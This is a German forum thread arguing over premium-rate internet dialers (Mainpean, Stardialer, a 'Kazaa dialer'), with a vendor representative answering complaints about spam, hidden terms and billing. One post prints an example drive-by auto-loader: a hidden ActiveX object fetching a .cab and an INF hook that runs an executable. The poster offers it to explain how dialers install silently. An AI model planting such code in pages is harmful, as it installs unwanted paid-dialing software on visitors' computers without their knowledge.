s2k - mainpean dialer - acoreus - c/o in-telegence

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Ich will hier mal ein positives Beispiel eines Dialerherstellers bringen. Vor etwa einem Jahr erhielt ich Mailmüll, der zu einer Dialerinstalltion verleiten sollte. Ich kannte die unselige Eierei mit dem Stardialer-SPAM und habe mit wenig Erwartungen den Anbieter darauf hingewiesen.

Zurück kam ganz prompt
Hallo Herr Vill,

auf wir bedauern dies sehr, zumal wir selbst ebenfalls alle diese
Mails erhalten.
Leider können wir momentan nicht mehr tun, als den betreffenden
Partner anzuschreiben und ihn von unserer Plattform auszuschließen.
Dies haben wir bereits getan.

Da wir derzeit mehr als 200 Beschwerden hierzu erhalten, erwägen wir
mittlerweile eine Anklage des Versenders. Dazu haben wir am Montag
ein ausführliches Gespräch in unserer Anwaltskanzlei.

Wir bieten keinerlei Faxabrufnummern oder sonstige Telekommunikations-
dienstleistungen an. Das Angebot in der Mail bezieht sich nicht auf
Dienste, die wir anbieten, sondern auf Angebote eines unserer Kunden.

mfg
Ihr ??????????.de-Team
?????? ???????

und einen Tag später
Sehr geehrter Herr Vill,

dann auch hier die Adresse des Absenders:
(soweit uns bekannt)

????? ?????
????????? 23
????? ???????

Wir werden bei Häufung der Beschwerden über diesen
User ebenfalls eine Abmahnung durch unseren Rechts-
anwalt veranlassen.

Auch hier ist der User bereits angeschrieben und sein
Kundenaccount bei uns gesperrt.

mfg
Ihr ??????????.de-Team
N.N.

Dieser Anbieter fiel mir nie mehr auf in diesem Zusammenhang. Die hatten die richtige Einstellung, die richtigen AGBs und kommen auch bis heute gut mit der "ausländischen Konkurrenz" zurecht. Dieses Gebahren kann ich als seriös akzeptieren.

Ich bin sicher, dass die, die es wollen, gut mit den unseriösen Werbepartnern zurecht kommen, indem sie diese mit den richtigen AGBs aussperren..

Die, die dauerhaft als Mitstörer in ungesetzlichen Aktionen auffällig werden, tun dies in voller Absicht des Mitverdienens oder sogar mehr.

Dietmar Vill
 
tonnos-berlin schrieb:
Na da wurde mal ein Stardialer gestartet. Entweder per Hand oder per ActiveX nach Bestätigung der MS-Sicherheitsabfrage. In diesem Ordner werden die von Dir gewählten Einstellungen gespeichert (Land, PW usw). Ansonsten macht der Ordner nichts.
Gruß Tonno

Das mit der Sicherheitsabfrage ist abhängig von der Konfiguration des Rechners. Eure Leute können nicht wissen, wie der IE diesbezüglich eingestellt ist.

Beispiel eines Autoloaders, der mit der Sicherheitseinstellung Download signed ActiveX Controls = Enable durchlädt:

<OBJECT height=0 width=0 styles=display:hidden classid=clsid:1230cb21-c88d-11cf-b347-000000000000 codebase=/EroticAccess/cabs/1694325xxxx.cab></object>

Und die Installer.Inf

[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\xxx.exe
FileVersion=1,0,0,4
[Version]
Signature=$CHICAGO$
AdvancedInf=2.

Es kein Dialer von Dir. Aber man kann so auch einen Stardialer zur Ausführung bringen.

Gruß
Comedian
 
tonnos-berlin schrieb:
Ich lasse sofort den Download, die Einwahl und die Auszahlung des Accounts sperren.
Allerings muss ich wiedersprechen: AGB´s, Verbraucherinfos sind sehr wohl und leicht zu finden. Und die "kryptischen Zeichen" sind uns z.B. durch den Verhaltenskodex der FST vorgegeben: Rufnummer, Anbieter, Preis.

http://www.intexus.de/sterndialer.jpg

Gruß Tonno

agb´s und verbraucherinfos sind nicht per "link§ dargestellt. ein pc (oder mac) user würde dahinter nie ein link vermuten.

das nenne ich bewußtes verstecken. kein pc benutzer würde auf die idee kommen, daß hinter einem normal dagestellten text ein link bzw. seitenfenster mit weiteren erklärungen kommt. links werden immer z.b. anders farbig dargestellt.

erd fst verhaltenskodex macht wohl manche vorgaben, aber im grunde genommen geht es doch darum um informationen zurück zu halten und user zu täuschen. warum haben dialer nicht ein risen warn schild: ACHTUNG NICHT KOSTENFREIER KONTEXT oder was auch immer.
 
tonnos-berlin schrieb:
bentigger schrieb:
technofreak schrieb:
In der Registrierung stand :

HKEY_LOCAL_MACHINE\Software\MainPean Highspeed

Ich habe hier keinen Modem/ISDN Zugang und daher keine Gefahr. Aber trotzdem, WOHER kommt plötzlich der Eintrag, wo ich ausser in diesen Foren sonst nur sehr wenig und nur auf seriösen Seiten verkehre und DEFINITV nie einen Dialer zu sehen bekommen hatte??

Tja wenn nun doch eine "Schmuddelseite" von mir aufgerufen wird, kommt dann ein Autodialerdownload zustande??

Soviel nun zu den "das passiert nur wenn man flüchtig klickt". Da gehöre ich schon aus beruflichen Gründen nicht zu. :(


Na da wurde mal ein Stardialer gestartet. Entweder per Hand oder per ActiveX nach Bestätigung der MS-Sicherheitsabfrage. In diesem Ordner werden die von Dir gewählten Einstellungen gespeichert (Land, PW usw). Ansonsten macht der Ordner nichts.

Gruß Tonno

ich habe xp vor einer woche neu aufgespielt und habe auch den eintrag in der reg. ich habe kein isdn mehr und die 190er gespeert.

meine frage: wie kommt dieser eintrag zustande???
ich habe keinen dialer ich besuche keine porno oder hacker seiten etc. (hab ich auch noch nie gemacht). die letzte hacker oder sex seite habe ich vor 8 jahren besucht und das mit meinem mac.
 
Link zu dem Download / Dialer erbeten

nun weckt das doch mein technisches Interesse.

Wo hast du denn geklickt, das würde ich mal gerne selber ansehen. :o

Bestimmt wollte der Dialer nur Dein Bestes von Dir,
das will ich mit Dir teilen. :wink:

0:-)
 
@ tonnos

Dann hab ich also gute Chancen, dass ich die geforderten Verbindungsentgelte nicht bezahlen muss, wenn ich auf den besagten Kazaa-Dialer hereingefallen bin?

Muss ich trotzdem den Weg über Beschwerdestelle/Verbraucherschutz/Polizei/etc. gehen oder reicht es, wenn ich mich bei Euch beschwere?

Gruss
ein hoffender Pechvogel
 
Pechvogel schrieb:
@ tonnos

Muss ich trotzdem den Weg über Beschwerdestelle/Verbraucherschutz/Polizei/etc. gehen oder reicht es, wenn ich mich bei Euch beschwere?

Gruss
ein hoffender Pechvogel


Code:
Da fragst du am besten mal den Geschäftsführer des Dialer-Herstellers, ob er dir die Sonntags-Kollekte wiedergibt.
 
Gutachter schrieb:
Da fragst du am besten mal den Geschäftsführer des Dialer-Herstellers, ob er dir die Sonntags-Kollekte wiedergibt.
Was will Pechvogel denn mit dem?

Wir haben hier doch einen tüchtigen Vertreter des Gewerbes, der dessen Ruf aufpolieren will. Dazu braucht es großzügige Taten, da kommt der Fall gerade recht.

Dietmar Vill
 
dvill schrieb:
Ich will hier mal ein positives Beispiel eines Dialerherstellers bringen. Vor etwa einem Jahr erhielt ich Mailmüll, der zu einer Dialerinstalltion verleiten sollte. Ich kannte die unselige Eierei mit dem Stardialer-SPAM und habe mit wenig Erwartungen den Anbieter darauf hingewiesen.

Zurück kam ganz prompt
Hallo Herr Vill,

auf wir bedauern dies sehr, zumal wir selbst ebenfalls alle diese
Mails erhalten.
Leider können wir momentan nicht mehr tun, als den betreffenden
Partner anzuschreiben und ihn von unserer Plattform auszuschließen.
Dies haben wir bereits getan.

Da wir derzeit mehr als 200 Beschwerden hierzu erhalten, erwägen wir
mittlerweile eine Anklage des Versenders. Dazu haben wir am Montag
ein ausführliches Gespräch in unserer Anwaltskanzlei.

Wir bieten keinerlei Faxabrufnummern oder sonstige Telekommunikations-
dienstleistungen an. Das Angebot in der Mail bezieht sich nicht auf
Dienste, die wir anbieten, sondern auf Angebote eines unserer Kunden.

mfg
Ihr ??????????.de-Team
?????? ???????

und einen Tag später
Sehr geehrter Herr Vill,

dann auch hier die Adresse des Absenders:
(soweit uns bekannt)

????? ?????
????????? 23
????? ???????

Wir werden bei Häufung der Beschwerden über diesen
User ebenfalls eine Abmahnung durch unseren Rechts-
anwalt veranlassen.

Auch hier ist der User bereits angeschrieben und sein
Kundenaccount bei uns gesperrt.

mfg
Ihr ??????????.de-Team
N.N.

Dieser Anbieter fiel mir nie mehr auf in diesem Zusammenhang. Die hatten die richtige Einstellung, die richtigen AGBs und kommen auch bis heute gut mit der "ausländischen Konkurrenz" zurecht. Dieses Gebahren kann ich als seriös akzeptieren.

Ich bin sicher, dass die, die es wollen, gut mit den unseriösen Werbepartnern zurecht kommen, indem sie diese mit den richtigen AGBs aussperren..

Die, die dauerhaft als Mitstörer in ungesetzlichen Aktionen auffällig werden, tun dies in voller Absicht des Mitverdienens oder sogar mehr.

Dietmar Vill


Herr Vill,

wir haben bestimmt hunderte Accounts gesperrt.

Gruß Tonno
 
d.ax schrieb:
tonnos-berlin schrieb:
Ich lasse sofort den Download, die Einwahl und die Auszahlung des Accounts sperren.
Allerings muss ich wiedersprechen: AGB´s, Verbraucherinfos sind sehr wohl und leicht zu finden. Und die "kryptischen Zeichen" sind uns z.B. durch den Verhaltenskodex der FST vorgegeben: Rufnummer, Anbieter, Preis.

http://www.intexus.de/sterndialer.jpg

Gruß Tonno

agb´s und verbraucherinfos sind nicht per "link§ dargestellt. ein pc (oder mac) user würde dahinter nie ein link vermuten.

das nenne ich bewußtes verstecken. kein pc benutzer würde auf die idee kommen, daß hinter einem normal dagestellten text ein link bzw. seitenfenster mit weiteren erklärungen kommt. links werden immer z.b. anders farbig dargestellt.

erd fst verhaltenskodex macht wohl manche vorgaben, aber im grunde genommen geht es doch darum um informationen zurück zu halten und user zu täuschen. warum haben dialer nicht ein risen warn schild: ACHTUNG NICHT KOSTENFREIER KONTEXT oder was auch immer.

Da hast Du recht. Ich schaue mir gleich mal den Dialer an, wenn er schöne blaue Links drin hat.

Ergebniss dann später.

Gruß Tonno
 
d.ax schrieb:
tonnos-berlin schrieb:
bentigger schrieb:
technofreak schrieb:
In der Registrierung stand :

HKEY_LOCAL_MACHINE\Software\MainPean Highspeed

Ich habe hier keinen Modem/ISDN Zugang und daher keine Gefahr. Aber trotzdem, WOHER kommt plötzlich der Eintrag, wo ich ausser in diesen Foren sonst nur sehr wenig und nur auf seriösen Seiten verkehre und DEFINITV nie einen Dialer zu sehen bekommen hatte??

Tja wenn nun doch eine "Schmuddelseite" von mir aufgerufen wird, kommt dann ein Autodialerdownload zustande??

Soviel nun zu den "das passiert nur wenn man flüchtig klickt". Da gehöre ich schon aus beruflichen Gründen nicht zu. :(


Na da wurde mal ein Stardialer gestartet. Entweder per Hand oder per ActiveX nach Bestätigung der MS-Sicherheitsabfrage. In diesem Ordner werden die von Dir gewählten Einstellungen gespeichert (Land, PW usw). Ansonsten macht der Ordner nichts.

Gruß Tonno

ich habe xp vor einer woche neu aufgespielt und habe auch den eintrag in der reg. ich habe kein isdn mehr und die 190er gespeert.

meine frage: wie kommt dieser eintrag zustande???
ich habe keinen dialer ich besuche keine porno oder hacker seiten etc. (hab ich auch noch nie gemacht). die letzte hacker oder sex seite habe ich vor 8 jahren besucht und das mit meinem mac.


Schicke mir doch mal Deine Machine-id. Die steht in dem genannten Ordner hinter Machine REG_DWORD.

Ich kann Dir dann sagen wo Du warst.

Gruß Tonno
 
Pechvogel schrieb:
@ tonnos

Dann hab ich also gute Chancen, dass ich die geforderten Verbindungsentgelte nicht bezahlen muss, wenn ich auf den besagten Kazaa-Dialer hereingefallen bin?

Muss ich trotzdem den Weg über Beschwerdestelle/Verbraucherschutz/Polizei/etc. gehen oder reicht es, wenn ich mich bei Euch beschwere?

Gruss
ein hoffender Pechvogel

Bitte die Telefonrechnung mal direkt an mich faxen (030 64904-101 Bitte noch draufschreiben: "wie besprochen z.H. Herr Richter persönlich"). Ich rede mit dem Contentanbieter. Wenn Du nur kurz im System warst, sehe ich da eine Möglichkeit. Wenn Du allerdings 30 Minuten oder ne Stunde drin warst.....

Gruß Tonno aus Berlin Köpenick
 
tonnos-berlin schrieb:
Schicke mir doch mal Deine Machine-id. Die steht in dem genannten Ordner hinter Machine REG_DWORD.

Ich kann Dir dann sagen wo Du warst.

Gruß Tonno

Code:
Was wird denn bei dem Provider alles gespeichert ?
und wie lange steht das  zur Verfügung ?
 
tonnos-berlin schrieb:
wir haben bestimmt hunderte Accounts gesperrt.

Gruß Tonno

Ich präzisiere die Aussage noch mal.

Es geht nicht darum, wieviele Accounts "gesperrt" werden. Wir wissen auch nicht, wieviel neu aufgemacht werden, für die gleichen Partner, versteht sich.

Das genannte Beispiel zeigt, dass ein Dialeranbieter es schaffen kann, sein Umfeld von zwielichtigen Machenschaften freizuhalten, wenn er es wirklich will. Hier müssen die Lippenbekenntnisse eben auch wirkliche Geschäftspolitik sein. Es geht mit den richtigen AGBs und dem Willen, an unseriösen Machenschaften nicht profitierend beteiligt sein zu wollen.

Ich bin überzeugt, dass kein Anbieter "zufällig" und ohne Handlungsalternative dauerhaft als Mitstörer auffällig wird.

Dietmar Vill
 
Gutachter schrieb:
tonnos-berlin schrieb:
Schicke mir doch mal Deine Machine-id. Die steht in dem genannten Ordner hinter Machine REG_DWORD.

Ich kann Dir dann sagen wo Du warst.

Gruß Tonno

Code:
Was wird denn bei dem Provider alles gespeichert ?
und wie lange steht das  zur Verfügung ?


Beim Provider oder bei uns?
Ansonsten:
Die Mainpean GmbH und/oder der von ihr eingeschaltete Telefon-Dienstleister speichern die Bestands- und Nutzungsdaten nur für die Dauer und zum Zwecke der Durchführung des Abrechnungsverhältnisses; sie werden unverzüglich gelöscht, sobald ihre Vorhaltung nicht mehr erforderlich ist. Die zur Abrechnung übermittelten Daten werden von uns unter Beachtung des Teledienst-Datenschutzgesetzes (TDDSG) verwaltet. Diese Daten werden unbeteiligten Personen / Unternehmen, die nicht am Abrechnungsprozess beteiligt sind bzw. kein berechtigtes Interesse haben, weder einsichtig noch zugänglich gemacht. Weitere Fragen bezüglich der gespeicherten Daten können (möglichst schriftlich) an die Mainpean GmbH gerichtet werden.

Gruß Tonno
 
dvill schrieb:
tonnos-berlin schrieb:
wir haben bestimmt hunderte Accounts gesperrt.

Gruß Tonno

Ich präzisiere die Aussage noch mal.

Es geht nicht darum, wieviele Accounts "gesperrt" werden. Wir wissen auch nicht, wieviel neu aufgemacht werden, für die gleichen Partner, versteht sich.

Das genannte Beispiel zeigt, dass ein Dialeranbieter es schaffen kann, sein Umfeld von zwielichtigen Machenschaften freizuhalten, wenn er es wirklich will. Hier müssen die Lippenbekenntnisse eben auch wirkliche Geschäftspolitik sein. Es geht mit den richtigen AGBs und dem Willen, an unseriösen Machenschaften nicht profitierend beteiligt sein zu wollen.

Ich bin überzeugt, dass kein Anbieter "zufällig" und ohne Handlungsalternative dauerhaft als Mitstörer auffällig wird.

Dietmar Vill

Ich meine es geht um das Verhältniss. Wenn ich wirklich mal zwei Zahlen gegenüberstelle: Kundenanzahl im fünfstelligen Bereich, täglich. Dagen natürlich auch Beschwerden. Im Verhältniss unter 0.5%.
Dieser Wert ist für mich entscheident. Nicht: Dialeranbieter hat ein seriöses Umfeld. Klar bei 5 Kunden am Tag.
Mehr Partner- leider auch mehr schwarze Schafe.
Oder warum hat VW die meisten Unfälle (absolut)?

Gruß Tonno
 
Da bin ich ja mal neugierig!

Hallo zusammen!

Schön zu lesen, dass sich tonno meiner Dialer-Abrechnung annehmen will. Allerdings müssen jetzt auf Worte Taten folgen.
Die Verbindungsdauer beträgt im EVN der Telekom 2 Minuten. Diverse Online-Tools, die bei mir ständig im Hintergrund mitprotokollieren haben allerdings nur 1 Minute 34 Sekunden.
Außerdem wird bei mir noch eine zweite Verbindung (ein paar Sekunden früher) mit 14 Sekunden Dauer abgerechnet. Allerdings war ich da noch (lt. den Protokolldateien) über T-Online ins Internet eingewählt.

So, jetzt bin ich mal neugierig, was passiert!

Lieben Gruss,

der Pechvogel - der hoffentlich bald keiner mehr ist...
 
tonnos-berlin schrieb:
Oder warum hat VW die meisten Unfälle (absolut)?

Gruß Tonno

Das Beispiel mit VW ist schön anschaulich.

Wenn ein Autohersteller das Bremspedal auf der Beifahrerseite montiert, mit dem schönen Argument, das Einsteigen für den Fahrer erleichtern zu wollen, würden die schon auf die Unfallquote Einfluss nehmen.

Die Autohersteller sehen glücklicherweise in den Unfallwagen, die neu zu beschaffen sind, keinen Marktanreiz und liefern ihre Autos mit klaren Betriebsanweisungen und hinreichenden Sicherheitvorschriften aus, um Fehlbedienungen der Kunden bestmöglich zu vermeiden.

Dialerhersteller müssen da erst noch hinkommen, aber vielleicht beginnt zumindest der Erkenntnisprozess.

Wir lassen uns von Taten überzeugen.

Dietmar Vill
 
tonnos-berlin schrieb:
PS: Dialerdesign des "KazaaDialers" wird verändert.

Als diese Äusserung gemacht wurde, habe ich das neue Layout nicht geprüft, sondern tatsächlich den Worten vertraut und eine Änderung vermutet.

Heute habe ich den Test gemacht und finde praktisch den gleichen Dreck.

Einzig die kryptische Verschlüsselung der Preisinformation steht weniger weit weg von "Freigabefeld" als zuvor.

Das bestärkt mich in dem Glauben, dass der schlechte Ruf des Gewerbes der tristen Realität voll gerecht wird und ein Wille zur Änderung der Realität nicht besteht, sondern nur die Bemühung, diese Realität öffentlichkeitswirksam zu beschönigen.

Dietmar Vill
 
Meiner Meinung nach kann Mainpean aus dem Kazaa Dialer höchstens die Gebühren eines normalen ISP verlangen (70 bis 90 ct/h). Für den versprochenen Transit zum Filesharing von Kazaa wird üblicherweise keine Vergütung an den Webmaster fällig.

Ausserdem vermute ich einen gravierenden Markenrechtsverstoss (es sei denn Mainpean hat von Sharman Networks Ltd eine Gestattung zur Verwendung des Markenzeichens). Ich finde auch die Namensgleichheit des Dialers (KAZAA.EXE) mit dem Namen der ausführbaren Datei des Kazaa Media Desktops verblüffend (ebenfalls KAZAA.EXE). Wie lange wird Sharman dem MD und Mainpean noch zuschauen?

Gruß
Comedian
 
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